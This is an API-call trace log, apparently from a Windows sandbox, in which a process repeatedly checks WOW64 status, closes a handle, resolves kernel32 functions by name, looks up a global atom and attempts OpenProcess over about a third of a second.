	[0130.783] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.783] CloseHandle (hObject=0x2dc) returned 1
	[0130.783] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.784] CloseHandle (hObject=0x2dc) returned 1
	[0130.784] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.784] CloseHandle (hObject=0x2dc) returned 1
	[0130.784] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.784] CloseHandle (hObject=0x2dc) returned 1
	[0130.784] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.784] CloseHandle (hObject=0x2dc) returned 1
	[0130.784] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.784] CloseHandle (hObject=0x2dc) returned 1
	[0130.785] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.785] CloseHandle (hObject=0x2dc) returned 1
	[0130.785] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.785] CloseHandle (hObject=0x2dc) returned 1
	[0130.785] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.785] CloseHandle (hObject=0x2dc) returned 1
	[0130.785] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.786] CloseHandle (hObject=0x2dc) returned 1
	[0130.786] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.786] CloseHandle (hObject=0x2dc) returned 1
	[0130.786] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.786] CloseHandle (hObject=0x2dc) returned 1
	[0130.786] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.786] CloseHandle (hObject=0x2dc) returned 1
	[0130.786] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.786] CloseHandle (hObject=0x2dc) returned 1
	[0130.787] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.787] CloseHandle (hObject=0x2dc) returned 1
	[0130.787] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.787] CloseHandle (hObject=0x2dc) returned 1
	[0130.787] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.787] CloseHandle (hObject=0x2dc) returned 1
	[0130.787] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.787] CloseHandle (hObject=0x2dc) returned 1
	[0130.788] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.788] CloseHandle (hObject=0x2dc) returned 1
	[0130.788] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.788] CloseHandle (hObject=0x2dc) returned 1
	[0130.788] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.788] CloseHandle (hObject=0x2dc) returned 1
	[0130.788] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.788] CloseHandle (hObject=0x2dc) returned 1
	[0130.789] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.789] CloseHandle (hObject=0x2dc) returned 1
	[0130.789] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.789] CloseHandle (hObject=0x2dc) returned 1
	[0130.789] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.789] CloseHandle (hObject=0x2dc) returned 1
	[0130.789] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.789] CloseHandle (hObject=0x2dc) returned 1
	[0130.789] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.790] CloseHandle (hObject=0x2dc) returned 1
	[0130.790] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.790] CloseHandle (hObject=0x2dc) returned 1
	[0130.790] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.790] CloseHandle (hObject=0x2dc) returned 1
	[0130.790] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0130.791] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0130.791] GetProcessTimes (in: hProcess=0x2dc, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0130.791] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0130.791] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0130.791] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0130.791] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0130.792] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0130.792] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0130.792] CloseHandle (hObject=0x2dc) returned 1
	[0130.792] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0130.792] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.792] CloseHandle (hObject=0x2dc) returned 1
	[0130.792] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.792] CloseHandle (hObject=0x2dc) returned 1
	[0130.792] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.792] CloseHandle (hObject=0x2dc) returned 1
	[0130.793] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.793] CloseHandle (hObject=0x2dc) returned 1
	[0130.793] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.793] CloseHandle (hObject=0x2dc) returned 1
	[0130.825] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.825] CloseHandle (hObject=0x2dc) returned 1
	[0130.826] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.826] CloseHandle (hObject=0x2dc) returned 1
	[0130.826] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.826] CloseHandle (hObject=0x2dc) returned 1
	[0130.826] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.826] CloseHandle (hObject=0x2dc) returned 1
	[0130.826] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.826] CloseHandle (hObject=0x2dc) returned 1
	[0130.826] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.827] CloseHandle (hObject=0x2dc) returned 1
	[0130.827] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.827] CloseHandle (hObject=0x2dc) returned 1
	[0130.827] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.827] CloseHandle (hObject=0x2dc) returned 1
	[0130.827] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.827] CloseHandle (hObject=0x2dc) returned 1
	[0130.827] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.827] CloseHandle (hObject=0x2dc) returned 1
	[0130.828] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.828] CloseHandle (hObject=0x2dc) returned 1
	[0130.828] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.828] CloseHandle (hObject=0x2dc) returned 1
	[0130.828] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.828] CloseHandle (hObject=0x2dc) returned 1
	[0130.828] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.828] CloseHandle (hObject=0x2dc) returned 1
	[0130.829] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.829] CloseHandle (hObject=0x2dc) returned 1
	[0130.829] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.829] CloseHandle (hObject=0x2dc) returned 1
	[0130.829] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.829] CloseHandle (hObject=0x2dc) returned 1
	[0130.829] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.829] CloseHandle (hObject=0x2dc) returned 1
	[0130.830] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.830] CloseHandle (hObject=0x2dc) returned 1
	[0130.830] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.830] CloseHandle (hObject=0x2dc) returned 1
	[0130.830] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.830] CloseHandle (hObject=0x2dc) returned 1
	[0130.830] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.830] CloseHandle (hObject=0x2dc) returned 1
	[0130.830] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.830] CloseHandle (hObject=0x2dc) returned 1
	[0130.831] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.831] CloseHandle (hObject=0x2dc) returned 1
	[0130.831] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.831] CloseHandle (hObject=0x2dc) returned 1
	[0130.831] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.831] CloseHandle (hObject=0x2dc) returned 1
	[0130.831] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.831] CloseHandle (hObject=0x2dc) returned 1
	[0130.832] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.832] CloseHandle (hObject=0x2dc) returned 1
	[0130.832] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.832] CloseHandle (hObject=0x2dc) returned 1
	[0130.832] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.832] CloseHandle (hObject=0x2dc) returned 1
	[0130.833] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0130.833] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0130.833] GetProcessTimes (in: hProcess=0x2dc, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0130.833] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0130.834] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0130.834] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0130.834] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0130.834] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0130.834] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0130.834] CloseHandle (hObject=0x2dc) returned 1
	[0130.834] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0130.834] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.834] CloseHandle (hObject=0x2dc) returned 1
	[0130.835] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.835] CloseHandle (hObject=0x2dc) returned 1
	[0130.835] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.835] CloseHandle (hObject=0x2dc) returned 1
	[0130.835] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.835] CloseHandle (hObject=0x2dc) returned 1
	[0130.835] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.835] CloseHandle (hObject=0x2dc) returned 1
	[0130.868] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.868] CloseHandle (hObject=0x2dc) returned 1
	[0130.868] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.868] CloseHandle (hObject=0x2dc) returned 1
	[0130.868] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.868] CloseHandle (hObject=0x2dc) returned 1
	[0130.869] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.869] CloseHandle (hObject=0x2dc) returned 1
	[0130.869] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.869] CloseHandle (hObject=0x2dc) returned 1
	[0130.869] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.869] CloseHandle (hObject=0x2dc) returned 1
	[0130.869] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.869] CloseHandle (hObject=0x2dc) returned 1
	[0130.870] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.870] CloseHandle (hObject=0x2dc) returned 1
	[0130.870] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.870] CloseHandle (hObject=0x2dc) returned 1
	[0130.870] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.870] CloseHandle (hObject=0x2dc) returned 1
	[0130.870] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.870] CloseHandle (hObject=0x2dc) returned 1
	[0130.870] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.871] CloseHandle (hObject=0x2dc) returned 1
	[0130.871] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.871] CloseHandle (hObject=0x2dc) returned 1
	[0130.871] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.871] CloseHandle (hObject=0x2dc) returned 1
	[0130.871] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.871] CloseHandle (hObject=0x2dc) returned 1
	[0130.871] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.871] CloseHandle (hObject=0x2dc) returned 1
	[0130.872] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.872] CloseHandle (hObject=0x2dc) returned 1
	[0130.872] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.872] CloseHandle (hObject=0x2dc) returned 1
	[0130.872] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.872] CloseHandle (hObject=0x2dc) returned 1
	[0130.872] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.872] CloseHandle (hObject=0x2dc) returned 1
	[0130.872] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.873] CloseHandle (hObject=0x2dc) returned 1
	[0131.027] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.027] CloseHandle (hObject=0x2dc) returned 1
	[0131.027] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.027] CloseHandle (hObject=0x2dc) returned 1
	[0131.028] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.028] CloseHandle (hObject=0x2dc) returned 1
	[0131.028] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.028] CloseHandle (hObject=0x2dc) returned 1
	[0131.028] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.028] CloseHandle (hObject=0x2dc) returned 1
	[0131.028] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.028] CloseHandle (hObject=0x2dc) returned 1
	[0131.028] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.029] CloseHandle (hObject=0x2dc) returned 1
	[0131.029] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.029] CloseHandle (hObject=0x2dc) returned 1
	[0131.029] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.029] CloseHandle (hObject=0x2dc) returned 1
	[0131.029] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0131.030] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0131.030] GetProcessTimes (in: hProcess=0x2dc, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0131.030] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0131.030] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0131.030] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0131.031] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0131.031] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0131.031] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0131.031] CloseHandle (hObject=0x2dc) returned 1
	[0131.031] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0131.031] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.031] CloseHandle (hObject=0x2dc) returned 1
	[0131.031] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.031] CloseHandle (hObject=0x2dc) returned 1
	[0131.032] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.032] CloseHandle (hObject=0x2dc) returned 1
	[0131.032] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.032] CloseHandle (hObject=0x2dc) returned 1
	[0131.032] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.032] CloseHandle (hObject=0x2dc) returned 1
	[0131.065] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.065] CloseHandle (hObject=0x2dc) returned 1
	[0131.066] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.066] CloseHandle (hObject=0x2dc) returned 1
	[0131.066] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.066] CloseHandle (hObject=0x2dc) returned 1
	[0131.066] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.066] CloseHandle (hObject=0x2dc) returned 1
	[0131.066] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.067] CloseHandle (hObject=0x2dc) returned 1
	[0131.067] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.067] CloseHandle (hObject=0x2dc) returned 1
	[0131.067] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.067] CloseHandle (hObject=0x2dc) returned 1
	[0131.067] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.067] CloseHandle (hObject=0x2dc) returned 1
	[0131.067] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.067] CloseHandle (hObject=0x2dc) returned 1
	[0131.068] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.068] CloseHandle (hObject=0x2dc) returned 1
	[0131.068] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.068] CloseHandle (hObject=0x2dc) returned 1
	[0131.068] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.068] CloseHandle (hObject=0x2dc) returned 1
	[0131.068] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.068] CloseHandle (hObject=0x2dc) returned 1
	[0131.069] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.069] CloseHandle (hObject=0x2dc) returned 1
	[0131.069] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.069] CloseHandle (hObject=0x2dc) returned 1
	[0131.069] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.069] CloseHandle (hObject=0x2dc) returned 1
	[0131.069] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.069] CloseHandle (hObject=0x2dc) returned 1
	[0131.070] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.070] CloseHandle (hObject=0x2dc) returned 1
	[0131.070] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.070] CloseHandle (hObject=0x2dc) returned 1
	[0131.070] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.070] CloseHandle (hObject=0x2dc) returned 1
	[0131.070] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.070] CloseHandle (hObject=0x2dc) returned 1
	[0131.070] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.071] CloseHandle (hObject=0x2dc) returned 1
	[0131.071] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.071] CloseHandle (hObject=0x2dc) returned 1
	[0131.071] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.071] CloseHandle (hObject=0x2dc) returned 1
	[0131.071] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.071] CloseHandle (hObject=0x2dc) returned 1
	[0131.071] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.071] CloseHandle (hObject=0x2dc) returned 1
	[0131.072] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.072] CloseHandle (hObject=0x2dc) returned 1
	[0131.072] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.072] CloseHandle (hObject=0x2dc) returned 1
	[0131.072] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.072] CloseHandle (hObject=0x2dc) returned 1
	[0131.072] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.072] CloseHandle (hObject=0x2dc) returned 1
	[0131.073] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0131.073] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0131.073] GetProcessTimes (in: hProcess=0x2dc, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0131.073] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0131.074] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0131.074] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0131.074] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0131.074] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0131.074] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0131.074] CloseHandle (hObject=0x2dc) returned 1
	[0131.074] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0131.074] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.075] CloseHandle (hObject=0x2dc) returned 1
